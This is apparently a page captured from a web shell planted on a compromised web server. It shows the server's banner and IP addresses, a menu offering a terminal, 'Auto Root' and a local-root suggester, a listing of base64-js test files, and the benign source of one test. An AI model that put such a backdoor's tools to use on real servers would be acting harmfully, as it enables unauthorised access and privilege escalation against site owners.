Linux unitednationsplay.com 3.10.0-1160.45.1.el7.x86_64 #1 SMP Wed Oct 13 17:20:51 UTC 2021 x86_64
nginx/1.20.1
Server IP : 188.130.139.92 & Your IP : 18.227.140.134
Domains :
Cant Read [ /etc/named.conf ]
User : web
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
home /
www /
unp_probe /
node_modules /
base64-js /
test /
Delete
Unzip
Name
Size
Permission
Date
Action
big-data.js
591
B
-rw-r--r--
1985-10-26 08:15
convert.js
2.15
KB
-rw-r--r--
1985-10-26 08:15
corrupt.js
304
B
-rw-r--r--
1985-10-26 08:15
url-safe.js
577
B
-rw-r--r--
1985-10-26 08:15
Save
Rename
var test = require('tape') var b64 = require('../') test('convert big data to base64', function (t) { var b64str, arr, i, length var big = new Uint8Array(64 * 1024 * 1024) for (i = 0, length = big.length; i < length; ++i) { big[i] = i % 256 } b64str = b64.fromByteArray(big) arr = b64.toByteArray(b64str) t.ok(equal(arr, big)) t.equal(b64.byteLength(b64str), arr.length) t.end() }) function equal (a, b) { var i var length = a.length if (length !== b.length) return false for (i = 0; i < length; ++i) { if (a[i] !== b[i]) return false } return true }